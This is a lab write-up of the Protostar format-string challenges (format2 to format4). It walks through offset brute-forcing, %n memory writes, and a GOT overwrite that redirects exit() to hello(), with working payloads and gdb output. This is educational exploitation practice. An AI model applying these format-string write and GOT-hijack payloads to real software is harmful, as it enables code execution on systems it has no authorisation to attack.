$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format2 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141target is 0 :(
Now we need to find the address of target
variable:
$ objdump -t format2 | grep target
080496e4 g O .bss 00000004 target
Let’s try to rewrite to rewrite the variable with uncertain value:
$ python -c "print '\xe4\x96\x04\x08'+'%4\$n'" | ./format2
��
target is 4 :(
We write 4 bytes and it says about it. If we want to write more, we just need to increase the number of bytes written. In this case the program will get 64 bytes before %4$n
and then it replaces %4$n
with the number of bytes it has already written:
$ python -c "print '\xe4\x96\x04\x08'+'A'*60+'%4\$n'" | ./format2
��AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
you have modified the target :)
We start this challenge with bruteforcing to find the offset:
$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format3 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
...
11
12 AAAAAA41414141target is 00000000 :(
Now we need to find the memory address of target
:
$ objdump -t format3 | grep target
080496f4 g O .bss 00000004 target
So let’s try to rewrite target
:
$ python -c "print '\xf4\x96\x04\x08'+'%12\$n'" | ./format3
��
target is 00000004 :(
Awesome! It says we rewrote 4 bytes.
Then I tried to extend the string and look and the stack:
$ python -c "print 'AAAABBBBCCCCDDDDEEEEFFFFGGGG'+'%x.'*16" | ./format3
AAAABBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.41414141.42424242.43434343.44444444.45454545.
target is 00000000 :(
Now let’s try to directly take 12th and then look at values on the stack:
$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDDEEEEFFFFGGGG'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDDEEEEFFFFGGGG0.bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.45454545.46464646.47474747.24323125.2e78256e.
target is 0000001c :(
To be clearer let’s draw simple scheme of our stack:
junk <- 1st, 2nd, ... values
...
\xf4\x96\x04\x08 <- 12th value
BBBB <- 13th value
CCCC <- 15th value
DDDD <- 16th value
EEEE
FFFF
GGGG
...
<saved ebp>
<saver ret>
I understand that it could be confusing. Because here numbers don’t have nothing with how the stack grows. They are just argument numbers. If so try to read about direct access in this paper.
Now everything is clear: we need to replace BBBB
, CCCC
, DDDD
with address + i
to rewrite each byte and add needed offsets in order to write the right value.
Let’s try to rewrite the lowest byte first. It must be 0x44
:
$ python -c "print '\xf4\x96\x04\x08BBBBCCCCDDDD'+'%52u'+'%12\$n'+'%x.'*20" | ./format3
��BBBBCCCCDDDD 0bffff4c0.b7fd7ff4.0.0.bffff6c8.804849d.bffff4c0.200.b7fd8420.bffff504.80496f4.42424242.43434343.44444444.75323525.24323125.2e78256e.252e7825.78252e78.2e78252e.
target is 00000044 :(
Then I tried to rewrite the third bite:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%13\$n'" | ./format3
����CCCCDDDD 0
target is 00004444 :(
Awesome, it works. I didn’t know it keeps the number of already written bytes. So it’s easier to write small values first. We need to get 0x01025544
, but we certainly cannot get 0x01
and 0x02
. However we can try to write 0x101
for example. We will write in this order: 0x44
, 0x55
, 0x101
, 0x102
(or maybe 0x202
).
0x55
is a third byte, so we need increase our address just by 1:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08CCCCDDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'" | ./format3
����CCCCDDDD 0 3221222592
target is 00005544 :(
Instead of writing 0x101
and 0x102
we can try to write 0x102
as two byte value:
$ python -c "print '\xf4\x96\x04\x08\xf5\x96\x04\x08\xf6\x96\x04\x08DDDD'+'%52u'+'%12\$n'+'%17u'+'%13\$n'+'%173u'+'%14\$n'" | ./format3
������DDDD 0 3221222592 3086843892
you have modified the target :)
Wow, we modified the target :)
Now we need to redirect the flow. In order to do so we can just rewrite the return address.
As always we start with finding the offset:
$ for i in {1..20000}; do echo -n "$i "; echo -n "AAAAAA%$i\$x" | ./format4 | grep 4141; if (( $? == 0 )); then break; fi ; echo ""; done;
1
2
3
4 AAAAAA41414141
Now let’s find the address of hello()
function:
$ objdump -t format4 | grep hello
080484b4 g F .text 0000001e hello
From this point I understood that we are not supposed to rewrite the return address and we need to change the relocation table.
Let’s look at relocations:
$ objdump -TR format4
format4: file format elf32-i386
DYNAMIC SYMBOL TABLE:
00000000 w D *UND* 00000000 __gmon_start__
00000000 DF *UND* 00000000 GLIBC_2.0 fgets
00000000 DF *UND* 00000000 GLIBC_2.0 __libc_start_main
00000000 DF *UND* 00000000 GLIBC_2.0 _exit
00000000 DF *UND* 00000000 GLIBC_2.0 printf
00000000 DF *UND* 00000000 GLIBC_2.0 puts
00000000 DF *UND* 00000000 GLIBC_2.0 exit
080485ec g DO .rodata 00000004 Base _IO_stdin_used
08049730 g DO .bss 00000004 GLIBC_2.0 stdin
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
080496fc R_386_GLOB_DAT __gmon_start__
08049730 R_386_COPY stdin
0804970c R_386_JUMP_SLOT __gmon_start__
08049710 R_386_JUMP_SLOT fgets
08049714 R_386_JUMP_SLOT __libc_start_main
08049718 R_386_JUMP_SLOT _exit
0804971c R_386_JUMP_SLOT printf
08049720 R_386_JUMP_SLOT puts
08049724 R_386_JUMP_SLOT exit
Additionally to look at the relocation table you can use:
$ readelf -r format4
Relocation section '.rel.dyn' at offset 0x304 contains 2 entries:
Offset Info Type Sym.Value Sym. Name
080496fc 00000106 R_386_GLOB_DAT 00000000 __gmon_start__
08049730 00000905 R_386_COPY 08049730 stdin
Relocation section '.rel.plt' at offset 0x314 contains 7 entries:
Offset Info Type Sym.Value Sym. Name
0804970c 00000107 R_386_JUMP_SLOT 00000000 __gmon_start__
08049710 00000207 R_386_JUMP_SLOT 00000000 fgets
08049714 00000307 R_386_JUMP_SLOT 00000000 __libc_start_main
08049718 00000407 R_386_JUMP_SLOT 00000000 _exit
0804971c 00000507 R_386_JUMP_SLOT 00000000 printf
08049720 00000607 R_386_JUMP_SLOT 00000000 puts
08049724 00000707 R_386_JUMP_SLOT 00000000 exit
Good articles about shared libraries and relocations:
I thought it’s a good idea to try to rewrite exit()
function by the address of hello()
function. Thus we need to rewrite value at the address0x08049724
by 0x080484b4
.
Now let’s use a test exploit:
$ python -c "print '\x24\x97\x04\x08' + '%33968x' + '%4\$n'" > /tmp/exploit.txt
$ gdb format4
GNU gdb (GDB) 7.0.1-debian
Reading symbols from /opt/protostar/bin/format4...done.
(gdb) r < /tmp/exploit.txt
Starting program: /opt/protostar/bin/format4 < /tmp/exploit.txt
...
Program received signal SIGSEGV, Segmentation fault.
0x000084b4 in ?? ()
Awesome. We rewrote the first two bytes and jumped to 0x000084b4
. Let’s do the same with other two bytes. Do not forget to correct the offsets (-4 to the first one because we added new 4 bytes address).
Now run the exploit:
$ python -c "print '\x24\x97\x04\x08\x26\x97\x04\x08' + '%33964x' + '%4\$n' + '%33616x' + '%5\$n'" | ./format4
...
code execution redirected! you win